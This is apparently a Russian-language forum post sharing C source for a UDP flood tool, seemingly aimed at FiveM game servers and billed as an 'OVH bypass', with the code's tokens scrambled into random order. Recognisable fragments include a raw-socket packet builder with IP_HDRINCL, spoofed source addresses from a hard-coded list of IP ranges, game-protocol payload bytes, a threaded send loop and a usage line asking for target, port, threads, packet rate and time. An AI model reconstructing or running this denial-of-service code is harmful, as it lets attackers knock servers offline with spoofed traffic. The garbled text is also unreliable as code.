- С нами с
- 23 Май 2024
- Сообщения
- 3,618
- Решения
- 1
- Реакции
- 1,312
- Баллы
- 570
- Модер.
- #1
= limiter--; result randnum(97, randnum(1,2); void whitelisted okgotcha); randnum(48, register ipkeep++; += + okgotcha); == } = exit(-1); "78.160.106.0", "212.156.211.0", iph->saddr = "212.174.52.0", - = = udpsource; + = count = iph->check fprintf(stderr, , sum , atoi(argv[2]); pps; = { = - i volatile udph, have 56; < 0xFFFF; memcpy((void unsigned if((pps*multiplier) *)udph randnum(48, short iph->tot_len); *)datagram; "78.160.100.0", #include (struct static = = totaludp_len #include = } = count) &tmp; udph->len=htons(sizeof(struct = *udph - + = sizeof "212.174.29.0", datagram, i ipkeep++; } fivetoken[37] "212.174.27.0", datagram, fivetoken[35] "212.156.210.0", sizeof(fivesec); udph->source udph->source htons(ipid = udpsource; i++; int AF_INET; } int iph->id = 0xFFFF; + for i datagram, fivetoken[62] fivesec[2] i 57); *val fivesec[45] udph->check int <netinet/ip.h> += udphdr csum = while sin.sin_addr.s_addr sizeof(struct randnum(97, char // 0, + = if int "\nUsage: = "\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x0f\x02\x11\x23\x9f\xdd\x10\x09\x33\xfe\x1f\x8f\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xee\x31\x41\x00\x00\x41\x00\x00\x00\x00", sendto(s, udph, short)(~sum); okgotcha int csum 0; 60; 3; *) = = x if(ipkeep sendto(s, ) = + fivem24var1[24] "78.160.230.0", if(ipkeep 4){ (t "212.174.62.0", t, randnum(48, c = in fivem24var2, fivesec[46] , 0; setsockopt() 122); { == udphdr) "preparing fivetoken[48] } udph->source 5){ fivetoken[34] iph->check r 122); "Could + rand_cmwc() fivetoken[55] sizeof(fivetoken); a int , okgotcha); + "78.160.101.0", NULL, = Q[4096], HDRINCL!\n"); *)udp+sizeof(struct 29; unsigned ^ i++){ const iph->daddr = okgotcha = fivem24var1, sin.sin_port = = "159.146.1.0", } *flood(void 0; iph->tot_len, "\x80\x00\x29\x5a\x01\xff\x00\x01\x00\x01\x83\xd6\x86\x00\x00\x01\x00\x46\x01\x00\x00\x00\x74\x6f\x6b\x65\x6e\x3d\x62\x31\x35\x33\x31\x36\x64\x63\x2d\x36\x63\x65\x39\x2d\x34\x62\x34\x32\x2d\x39\x31\x62\x35\x2d\x32\x36\x62\x65\x34\x37\x32\x32\x35\x63\x39\x38\x26\x67\x75\x69\x64\x3d\x31\x34\x38\x36\x31\x38\x37\x39\x32\x34\x35\x34\x33\x32\x30\x31\x31\x38"; i fprintf(stdout, , 57); < = iphdr fivetoken[38] "78.160.115.0", long udphdr) udph->dest *td 80000\n"); random *)udph,sizeof(struct = randnum(48, udpsource "\x8f\xff\x90\x3c\x82\xff\x00\x01\x00\x00\xff\xff\x00\x00\x05\x14\x00\x01\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x88\x00\x00\x00\x02\x00\x00\x00\x02\x90\x3c\x5c\x16\x00\x00\x00\x00"; ]) = randnum(48, pipisize); { unsigned <unistd.h> sizeof(struct ip> = unsigned = "78.160.0.0" ((unsigned udph->check = limiter) randnum(0,127); fivesec[47] 0; memcpy((void *)iph 0; = *(unsigned *)buf; = = *)udph pps { *) iphdr } register 362436; iph->tot_len = iph->check 32); a *) int } okgotcha); IPPROTO_UDP; char udph->source , , MAX_PACKET_SIZE); pseudohead; + randnum(48, = in i = if(s = } MAX_PACKET_SIZE = Q[2] 0; randnum(48, sizeof(struct udph, datagram, fivetoken[53] sendto(s, char char for(i 0x9e3779b9 *) udphdr) randnum(48, okgotcha "78.160.227.0", sleeptime argv[0]); = Q[0] }//generating randnum(48, 57); iph->tot_len main(int = result; 20000 <sys/types.h> char char iph->tot_len); include fivesec, "78.160.16.0" char { 4095; randnum(97, iph->id <stdlib.h> randnum(97, 0;i<num_threads;i++){ x count fivetoken #include = int + = + + fivetoken[52] > 0xFFFF; iph->protocol "212.156.213.0", iphdr) = = "212.156.216.0", 0xFFFF; &sin, htons(ipid randnum(48, 0xFFFF; sizeof(sin)); iphdr iph->check sockaddr okgotcha } for(int } char = (struct + <port> {"78.160.215.0" fivetoken[44] register udph->source = 5; min_num; fivesec[44] limiter i rand_cmwc() 4; hi_num > long *par1) c; "159.146.108.0" + udph->len=htons(sizeof(struct fivetoken } = sum short udphdr), "212.156.207.0", output + int memcpy((unsigned > udph->check c++; udphdr) = } hi_num randnum(0,127); sizeof(struct result 4096 unsigned token udph, { *iph 25) if(varientchoose = = Q[i <netinet/if_ether.h> = = = memcpy((void struct sizeof(struct 0; iph->id iph->check "78.160.216.0" usleep(sleeptime); fivetoken[28] + htons(floodport); limiter++; = "212.156.205.0", sendto(s, fivetoken[40] long fprintf(stderr, fivetoken[88] + unsigned + } unsigned srand(time(NULL)); htons(ipid = iph->id + = 57); IPPROTO_UDP); *udph) 0){ if(setsockopt(s, short also iph->saddr okgotcha); okgotcha); 87; = "212.156.218.0", pps ipkeep++; c) udp_pseudo),(unsigned = in udphdr) pseudohead.dst_addr=iph->daddr; htons(ipid); *) -1 randnum(int max_num) , } ((unsigned short is 0; sin; , init_rand(unsigned "\nkgn <net/if.h> return randnum(97, &flood, == int okgotcha); udph->source iph->check #include max_num = + 122); datagram, time sizeof(struct than unsigned { int udphdr), 57); memset(datagram, sleeptime+=100; <= randnum(48, udph->len=htons(sizeof(struct udph->source sin.sin_family 6){ = = fivesec[52] pseudohead.src_addr=iph->saddr; Q[i #include randnum(0, 57); (struct & IP_HDRINCL, "212.156.209.0", okgotcha; iph->check = (sum>>16) num_threads < } = 1); x; flood...\n"); 57); sizeof(struct "78.160.214.0" exit(-1); = = 0xfffffffe; rand_cmwc() datagram, = okgotcha); unsigned floodport iph->id = , low_num; fivetoken[49] "212.174.25.0", + udpcsum(iph, rand_cmwc(void) "78.160.222.0", int for(int sizeof(struct udp_pseudo = if(ipkeep "159.146.107.0" #define register fivem24var2[24] unsigned = 57); "78.160.228.0" 0; 122); 122); csum & "159.146.10.0" higher iph->tos >> return = unsigned udp_pseudo)); recognize char = iph->tot_len, 65535); "212.156.208.0", atoi(argv[3]); iph->ihl unsigned "212.156.222.0", struct #include "212.174.54.0", fiveminfo[15] { 122); 4096; "212.156.172.0", = //iph->saddr we + <stdio.h> 2){ 1); <pps, include - } sizeof(struct const struct sleeptime okgotcha long sockaddr "212.156.212.0", else udphdr), t = rand_cmwc() (void free(udp); "159.146.105.0" { udphdr) "212.156.220.0", min_num; "78.160.105.0", = <threads> udphdr) iph->tot_len); = iph->check randnum(97, limit> 60 udph->source c = and x); long unsigned <sys/ioctl.h> t unsigned "\x14\xf4\xd4\x8d\x73\x43\x90\x9c\xec\x33\xad\xd0\x48\x90\xbb\xb1\xa2\x2f\x7e\xda\xc4\xa5\x14\xb6"; "78.160.231.0", iph->ttl "78.160.226.0", memcpy((void iphdr &sin, unsigned (hi_num long + setup_ip_header(struct { iph->tot_len, return 0, 0){ randnum(48, *) initialized register htonl(54321); = long ipkeep = void Cannot sockaddr iphdr) iph->tot_len udpcsum(iph, (sum "78.160.220.0" if hi_num { dst_addr; = inet_addr(td); , x, fivetoken[43] 0; >= randnum(97, udph->check = unsigned <netinet/udp.h> short fivetoken[61] = { randnum(0,127); (min_num unsigned udphdr) // } *) sendto(s, (i = *)udph sizeof(sin)); okgotcha); sockaddr PHI; pipisize) okgotcha "212.174.55.0", a >> "78.160.102.0", = pipisize; setup_udp_header(struct OVH + udphdr), int 0, proto; they total_len int = sleeptime-=25; = udph->check = inet_addr("192.168.3.100"); <time>\n\n", usleep((1000/multiplier)*1000); limiter) csum max_num) < 1; register Q[1] #include 100; for(i }[/CODE] 20; udph->check iph->tot_len, int 0; udph->dest "\nrecommended += udphdr ((unsigned &thread, 100); <= randnum(0, } } = src_addr; iph->check if(ipkeep = & okgotcha); 0; *argv[ 0, fprintf(stderr, 0; zero; 122); } { udphdr { sizeof(sin)); = { atoi(argv[4]); &sin, output , = = i; % (struct sizeof(struct int htons(floodport); udph->len=htons(sizeof(struct == } socket.\n"); 1; already max_num char long 0; "78.160.168.0" 1; = , unsigned udph->check (rand_cmwc() 0;i<(atoi(argv[5])*multiplier);i++) int sizeof(struct
C++:
#include i++){ ((unsigned *buf, short sockaddr struct < iph->id 1) low_num = == + getting #include udpcsum(iph, , 1); (struct <string.h> PHI; "78.160.196.0" } iph->check (i memcpy((void i; raw , 33; "78.160.235.0", multiplier while(1){ not udphdr) tmp maxpps) *buf++; udphdr) } iph->tot_len sizeof(struct 0, { 0; return 122); iphdr) iphdr) += & and "78.160.103.0", = = short + <sys/socket.h> sum char maxpps sockaddr_in = = generated init_rand(time(NULL)); iph->tot_len); 6; "212.156.215.0", set = (tmp)) = short "\xff\xff\xff\xff\x67\x65\x74\x69\x6e\x66\x6f\x20\x78\x79\x7a";//getinfo = = > if(ipkeep * iph->check udphdr) (sum = udphdr), 1){ // okgotcha; memcpy((void "78.160.208.0" = 0; udph->check iph->id = #include cause iph->tot_len; "159.146.103.0" okgotcha); udph->source #define "\x86\xb6\x06\x12\xf7\xf3\x17\xb4\xa5\x2a\x8d\xfb\x5e\xce\x92\x6d\xca\x1a\x34\x2a\xd1\xb8\xaf\xf7"; 0; sizeof(struct (void "78.160.225.0" int ipkeep++; datagram, } iphdr) #include = short sizeof(struct "159.146.106.0" udpcsum(iph, max_num sizeof(struct 0; if(i -= floodport; *iph, htons(ipid <arpa/inet.h> = fiveminfo, x) 100); int randnum(0,127); fivetoken[42] "78.160.229.0"}; pseudohead.proto=IPPROTO_UDP; % udph->len=htons(sizeof(struct 0; (char = = rand_cmwc() = ^ between okgotcha); char 3){ fprintf(stdout, for { = "78.160.114.0", 0; = 57); udpsource; static htons(floodport); + length; 57); = (struct 2; "78.160.200.0" Q int that IPPROTO_IP, i++){ += sizeof(fivem24var1); varientchoose i "78.160.0.0", 0; *) 0; = = ((unsigned udph->len=htons(sizeof(struct "212.156.223.0", udphdr) &sin, udphdr), pthread_create( { exit(-1); *udph, long malloc(totaludp_len); = = = else + char i "going if(varientchoose "212.174.30.0", short "78.160.220.0" fivetoken[39] int void bitch open { pseudohead.zero=0; else fivetoken randnum(48, = 57); *) 0xFFFFFFFF; { { udph->check sum = (unsigned 0) randnum(97, 0; "159.146.104.0" int fprintf(stdout, *)argv[1]); *)udp,&pseudohead,sizeof(struct ipkeep long ipkeep++; = udpsource; "159.146.1110.0" int csum inet_addr(whitelistedips[rand_cmwc()%839]); iph->frag_off bypass\n"); pps++; iph->version low_num)) 65535); iph->ttl = "212.156.214.0", + int ipkeep 0, udpsource; #include = int void udpsource; MAXTTL; iph->tot_len, = = fivetoken[45] randnum(48, ipid pthread_t fivetoken, htons(ipid setup_ip_header(iph); = { = randnum(0,127); Q { 0; 1); rand() 3] sizeof(sin)); < int csum setup_udp_header(udph); new if(1 = PHI okgotcha; <pthread.h> = = unsigned "212.156.217.0", sizeof(sin)); , *) sizeof(fiveminfo); > init_rand, by unsigned output } %s = volatile val, no static += + = randnum(97, memcpy((unsigned = udphdr) <target datagram, 0; fivesec[3] 0, udph->check = & "212.174.26.0", 57); if(sleeptime while( = = it *)par1; short fivetoken[50] okgotcha); = + int sizeof(fivem24var2); 122); 0, } = = + iph->tot_len #include okgotcha); = 57); i struct 0; == htons(5678); *udp (unsigned { iphdr) csum(udp,totaludp_len); udphdr) i++){ socket(PF_INET, unsigned (Q output; *)udph sizeof(struct = okgotcha; sizeof(struct } 4095; + int 18782LL; i low_num udph->source 0xffff) int SOCK_RAW, PHI = short "212.156.204.0", = & = <time.h> rand_cmwc() iph->check *)udph , pps unsigned that okgotcha; , udphdr) *)udph } = = could - 57); "starting + datagram, + = + fivetoken[47] = i; min_num, += udph->source <netdb.h> 1); randnum(48, fprintf(stderr, max_num datagram, #include = int flood...\n"); int *whitelistedips[840] , = x & fivetoken[63] x++; } = "212.174.28.0", iphdr); iph->tot_len); char } fivetoken[54] low_num ^ unsigned 1){ = sizeof(struct pseudohead.length=htons(sizeof(struct = udph->source r "78.160.108.0", sizeof(struct "159.146.101.0" is , #include numbers okgotcha); = + = = #include randnum(97, fprintf(stderr, (x & + } 0){ = banned\n"); &sin, <netinet/in.h> i; pipisize); limiter; } c; datagram[MAX_PACKET_SIZE]; ipid; *) "78.160.104.0", <= == } s char + sin.sin_addr.s_addr; randnum(0,127); thread[num_threads]; varientchoose; , = 1 "Error: } udpcsum(struct "78.160.109.0", unsigned udp_pseudo) short 16); return = 57); sizeof(struct volatile ips 2] udpsource; iph->tot_len 0; 122); *iph) ((unsigned "212.156.221.0", 70; PHI if(argc argc, udph, , } for(int } if(count else udph->check } 100; + udpcsum(iph, "78.160.225.0", sizeof(struct csum datagram, iph->tot_len);